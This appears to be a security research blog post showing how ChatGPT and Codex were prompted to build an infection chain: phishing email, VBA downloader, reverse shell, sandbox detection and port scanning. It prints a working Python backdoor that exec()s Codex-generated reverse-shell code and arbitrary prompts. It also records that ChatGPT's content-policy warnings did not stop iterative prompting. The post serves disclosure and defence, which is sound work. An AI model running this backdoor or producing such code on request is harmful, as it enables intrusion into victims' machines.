OpwnAI: AI that can save the day or hack it away

Introduction

OpenAI's release of ChatGPT, the new interface for its large language model (LLM), has sparked an explosion of interest in general AI in the media and on social networks in recent weeks. The model is used in many applications across the web and has been praised for its ability to generate well-written code and aid the development process. However, the new technology also carries risks. Lowering the bar for code generation, for example, can help less-skilled threat actors launch cyberattacks with little difficulty. In this article, Check Point Research demonstrates:

  • How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell.
  • How researchers created an additional backdoor that dynamically runs scripts that AI generates on the fly.
  • Examples of the positive effect of OpenAI on the defense side and how it can help researchers in their daily work.

The world of cyber security is changing rapidly. It is crucial to emphasize how this new and developing technology can affect the threat landscape, both for better and for worse. While this new technology helps defenders, it also lowers the bar of entry for low-skilled threat actors to run phishing campaigns and develop malware.

Background

From image generation to code writing, AI models have made huge strides in multiple fields, from the famous AlphaGo software that beat the best professional Go players in 2016 to improved speech recognition and machine translation that brought the world virtual assistants such as Siri and Alexa, which now play a big role in our daily lives.

Recently, public interest in AI spiked due to the release of ChatGPT, a prototype chatbot whose “purpose is to assist with a wide range of tasks and answer questions to the best of its ability.” Unless you’ve been disconnected from social media for the past few weeks, you’ve most likely seen countless screenshots of ChatGPT interactions, from writing poetry to answering programming questions.

But like any technology, ChatGPT’s increased popularity also brings increased risk. For example, Twitter is filled with examples of malicious code or dialogs generated by ChatGPT. Although OpenAI has invested huge efforts to stop abuse of its AI, it can still be used to produce dangerous code.

To illustrate this, we decided to use both ChatGPT and another OpenAI platform, Codex, an AI-based system that translates natural language into code, most proficient in Python but capable in other languages. We created a full infection flow and gave ourselves the following limitation: we did not write a single line of code and instead let the AIs do all the work. We only put the pieces of the puzzle together and executed the resulting attack.

We chose to illustrate our point with a single execution flow: a phishing email carrying a malicious Excel file weaponized with macros that download a reverse shell (one of the favorites among cybercriminals).

ChatGPT: The Talented Phisher

As a first step, we created a plausible phishing email. This cannot be done by Codex, which only generates code, so we asked ChatGPT to help and suggested that it impersonate a hosting company.

Figure 1 – Basic phishing email generated by ChatGPT

Note that while OpenAI warns that this content might violate its content policy, its output is off to a good start. In further interaction with ChatGPT, we can clarify our requirements: to avoid hosting additional phishing infrastructure, we want the target to simply download an Excel document. Asking ChatGPT to iterate once more produces an excellent phishing email:

Figure 2 – Phishing email generated by ChatGPT

The iteration process is essential for working with the model, especially for code. The next step, creating the malicious VBA code in the Excel document, also requires several iterations.
This is the first prompt:

Figure 3 – Simple VBA code generated by ChatGPT

This code is very naive and uses libraries such as WinHttpReq. However, after a short process of iteration and back-and-forth chatting, ChatGPT produces better code:

Figure 4 – Another version of the VBA code

This is still a very basic macro, but we decided to stop here, as obfuscating and refining VBA code can be a never-ending pursuit. ChatGPT proved that, given good text prompts, it can hand you working malicious code.

Codex – an artificial intelligence, or the future name of an implant?

Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is to translate natural language into code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code.

We first asked it to create a basic reverse shell for us using a placeholder IP and port. The query is the comment at the beginning of the code block.

Figure 5 – Basic reverse shell generated by Codex

This is a great start, but it would be nice if there were some malicious tools we could use to help us with our intrusion. Maybe some scanning tools, such as checking whether a service is open to SQL injection, and port scanning?

Figure 6 – The most basic implementation of SQLi generated by Codex

Figure 7 – Basic port scan script
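
For reference, here is a minimal sketch of what such a TCP connect-scan might look like. This is our own illustration rather than Codex's verbatim output, and the host and port range are placeholders:

import socket

def scan_ports(host, ports, timeout=0.5):
    # Report ports that accept a TCP connection as open
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connect() succeeded
                open_ports.append(port)
    return open_ports

print(scan_ports("192.0.2.1", range(20, 1025)))  # 192.0.2.1 is a documentation address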

This is also a good start, but we would like to add a few mitigations to make the defenders’ lives a little more difficult. Can we detect whether our program is running in a sandbox? The basic answer Codex gave is below. Of course, it can be improved by adding other providers and additional checks.

Figure 8 – Basic sandbox detection script
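
As a reference point, a minimal sketch of this kind of check (again our own illustration, not Codex's output) could compare the machine's MAC address against OUI prefixes registered to virtualization vendors:

import os
import uuid

# An illustrative subset of OUI prefixes registered to virtualization vendors;
# a real check would cover more providers and more artifacts
VM_MAC_PREFIXES = (
    "00:05:69", "00:0c:29", "00:1c:14", "00:50:56",  # VMware
    "08:00:27",                                      # VirtualBox
)

def looks_like_sandbox():
    # Format the 48-bit node ID returned by uuid.getnode() as aa:bb:cc:dd:ee:ff
    node = uuid.getnode()
    mac = ":".join(f"{(node >> shift) & 0xff:02x}" for shift in range(40, -1, -8))
    if mac.startswith(VM_MAC_PREFIXES):  # str.startswith accepts a tuple
        return True
    if (os.cpu_count() or 0) < 2:        # sandboxes often expose a single vCPU
        return True
    return False

print(looks_like_sandbox())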

We see that we are making progress. However, this is all standalone Python code. Even if an AI assembles these pieces for us (which it can), we cannot be sure the infected machine will have an interpreter installed. To make it run on any Windows machine, the easiest solution is to compile it into an exe file. Once again, our AI friends come through for us:

Figure 9 – Conversion from Python to exe
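
The article does not name the utility the AI suggested; assuming it is PyInstaller, the usual tool for this job, the conversion boils down to a single command, shown here through PyInstaller's Python entry point:

# Equivalent to running "pyinstaller --onefile payload.py" from the command line;
# payload.py is a placeholder name, and the bundled exe lands in dist/
import PyInstaller.__main__

PyInstaller.__main__.run([
    "--onefile",    # bundle the interpreter and script into a single executable
    "payload.py",
])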

And just like that, the flow of infection is complete. We created a phishing email, with an attached Excel document containing malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs and all that’s left for us to do is execute the attack.

No scripting knowledge? Don’t worry, English is good enough

We were curious to see how far down the rabbit hole goes. Creating the initial scripts and modules is fine, but a real cyberattack requires flexibility, as the attackers’ needs during an intrusion can change rapidly depending on the infected environment. To see how we can leverage the AI’s ability to create code on the fly to answer this dynamic need, we created the following short Python code. Compiled to a PE, the exe first runs the previously mentioned reverse shell. Afterward, it waits for commands with the -cmd flag and runs Python scripts generated on the fly by querying the Codex API and giving it a simple prompt in English.

import os
import sys
import openai
import argparse
import socket
import winreg
# os, socket and winreg are not used directly below; presumably they are
# available to the generated scripts run via exec()

openai.api_key = "<API_KEY>"  # key redacted

parser = argparse.ArgumentParser()
parser.add_argument('-cmd', type=str, help='Prompt that will be run on infected machine')
args = parser.parse_args()

def ExecuteReverseShell():
    # Ask Codex for a reverse shell script and run whatever it returns
    response = openai.Completion.create(
        model="code-davinci-002",
        prompt="\"\"\"\nRun reverse shell script on a Windows machine and connect to IP address <IP> port <PORT>.\n\"\"\"",  # placeholder IP and port
        temperature=0,
        max_tokens=1000,
        top_p=1,
        frequency_penalty=0,
        presence_penalty=0
    )
    exec(response.choices[0].text)

def ExecutePrompt(prompt):
    # Generate a script from an arbitrary English prompt and run it on the fly
    response = openai.Completion.create(
        model="code-davinci-002",
        prompt="\"\"\"\n" + prompt + "\n\"\"\"",
        temperature=0,
        max_tokens=1000,
        top_p=1,
        frequency_penalty=0,
        presence_penalty=0
    )
    exec(response.choices[0].text)

if __name__ == '__main__':
    if len(sys.argv) == 1:
        ExecuteReverseShell()
    if args.cmd:
        ExecutePrompt(args.cmd)

Below are a few examples of executions of this script. We leave the possible vectors for developing this type of attack to the curious reader:

Figure 10 – Execution of the code generated on the fly based on input in English

Using Codex to augment defenders

Up to this point, we have presented the threat actor’s side of using LLMs. To be clear, the technology itself is not malicious and can be used by any party. As attack processes can be automated, so can mitigations on the defenders’ side.

To illustrate this, we asked Codex to write two simple Python functions: one that helps search for URLs inside files using the YARA package, and another that queries VirusTotal for the number of detections of a specific hash. While better open-source implementations of these scripts already exist, written by the defense community, we hope to spark the imagination of blue teamers and threat hunters to use the new LLMs to automate and improve their work.

Figure 11 – VT API query to check the number of detections for a hash
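
A sketch of what such a lookup looks like against VirusTotal's documented v3 REST API; the hash and API key are placeholders, and this is our illustration rather than Codex's verbatim output:

import requests

def vt_detections(file_hash, api_key):
    # Query the v3 files endpoint and sum the engines that flagged the sample
    url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
    resp = requests.get(url, headers={"x-apikey": api_key})
    resp.raise_for_status()
    stats = resp.json()["data"]["attributes"]["last_analysis_stats"]
    return stats["malicious"] + stats["suspicious"]

print(vt_detections("<SHA256>", "<API_KEY>"))  # placeholders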

Figure 12 – YARA script that checks which URL strings are in a file
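
And a sketch of the URL-hunting function built on the yara-python package; the rule and file path are our own illustration:

import yara

# One rule whose only string is a regex matching http(s) URLs
URL_RULE = r'''
rule url_strings {
    strings:
        $url = /https?:\/\/[^\s"']+/
    condition:
        $url
}
'''

def find_urls(path):
    # Print every URL string YARA matches inside the given file
    rules = yara.compile(source=URL_RULE)
    for match in rules.match(path):
        for s in match.strings:          # yara-python >= 4.2 string-match API
            for inst in s.instances:
                print(inst.matched_data.decode(errors="replace"))

find_urls("sample.bin")  # placeholder path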

Conclusion

The growing roles of LLMs and AI in the cyber world are full of opportunity, but also come with risks. Although the code and infection flow presented in this article can be defended against with simple procedures, this is only a rudimentary showcase of the impact of AI research on cybersecurity. Multiple scripts can be generated easily, with slight variations using different wordings, and complex attack processes can likewise be automated using the LLMs’ APIs to generate other malicious artifacts. Defenders and threat hunters should be vigilant and quick to adopt this technology themselves; otherwise, our society will be one step behind the attackers.
